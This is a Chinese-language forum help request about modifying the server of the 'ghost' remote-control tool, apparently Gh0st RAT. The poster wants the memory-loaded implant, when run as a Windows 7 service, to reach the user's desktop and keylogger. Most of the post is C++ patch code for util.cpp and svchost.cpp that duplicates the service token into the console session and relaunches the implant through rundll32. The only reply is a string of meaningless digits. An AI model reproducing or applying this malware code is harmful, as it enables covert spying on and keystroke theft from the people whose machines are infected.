求助 ghost内存加载 服务启动黑屏

ertao

求助 ghost内存加载版 win7 服务启动下黑屏 键盘记录也用不了

按照下面这些代码添加不成功 搜索不到相应的代码

求助大侠帮帮忙 必有重谢 QQ 58909777


打开server的until.cpp文件.在最后面#endif的上面加上下列代码
    DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand )
    {
    DWORD dwRet = 0;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    DWORD dwSessionId;
    HANDLE hUserToken = NULL;
    HANDLE hUserTokenDup = NULL;
    HANDLE hPToken = NULL;
    HANDLE hProcess = NULL;
    DWORD dwCreationFlags;
    HMODULE hInstKernel32 = NULL;
    typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)();
    WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL;
    hInstKernel32 = LoadLibrary("Kernel32.dll");
    if (!hInstKernel32)
    {
    return FALSE;
    }
    WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId");
    // Log the client on to the local computer.
    dwSessionId = WTSGetActiveConsoleSessionId();
    do
    {
    WTSQueryUserToken( dwSessionId,&hUserToken );
    dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;
    ZeroMemory( &si, sizeof( STARTUPINFO ) );
    si.cb= sizeof( STARTUPINFO );
    si.lpDesktop = "winsta0\\default";
    ZeroMemory( &pi, sizeof(pi) );
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
    | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID
    | TOKEN_READ | TOKEN_WRITE, &hPToken ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    tp.PrivilegeCount =1;
    tp.Privileges[0].Luid =luid;
    tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
    if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    //Adjust Token privilege
    if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    LPVOID pEnv =NULL;
    DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL );
    CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary("UserEnv.dll"), "CreateEnvironmentBlock" );
    if (!CreateEnvironmentBlock) break;
    if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) )
    {
    dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;
    }
    else pEnv=NULL;
    // Launch the process in the client's logon session.
    if( CreateProcessAsUser( hUserTokenDup, // client's access token
    NULL, // file to execute
    lpCommand, // command line
    NULL, // pointer to process SECURITY_ATTRIBUTES
    NULL, // pointer to thread SECURITY_ATTRIBUTES
    FALSE, // handles are not inheritable
    dwCreationFlags,// creation flags
    pEnv, // pointer to new environment block
    NULL, // name of current directory
    &si, // pointer to STARTUPINFO structure
    &pi // receives information about new process
    ) )
    {
    }
    else
    {
    dwRet = GetLastError();
    break;
    }
    }
    while( 0 );
    //Perform All the Close Handles task
    if( NULL != hUserToken )
    {
    CloseHandle( hUserToken );
    }
    else;
    if( NULL != hUserTokenDup)
    {
    CloseHandle( hUserTokenDup );
    }
    else;
    if( NULL != hPToken )
    {
    CloseHandle( hPToken );
    }
    else;
    return dwRet;
    }
然后打开until.h 同样在最后面的#endif上面加上
    DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );
然后打开svchost.cpp
搜索extern "C" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )
在上面加上
    extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow )
    {
    main(lpCmdLine);
    }
搜索g_dwServiceType = QueryServiceTypeFromRegedit(svcname);在下面加上
    HANDLE hThread = NULL;
    OSVERSIONINFO OsVerInfoEx;
    OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&OsVerInfoEx);
    if ( OsVerInfoEx.dwMajorVersion < 6 )//判断那种系统，如果小于6，直接用原来的代码
    {
    HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
    }
    else
    {
    CHAR lpCommand[256];
    CHAR Start[MAX_PATH];
    GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));
    wsprintf(lpCommand,"rundll32.exe %s, XiaoDeBu %s",Start, svcname );
    LaunchAppIntoDifferentSession(lpCommand);
    }
然后把HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);这句注释掉.

yunlong963

3211111111111111111111111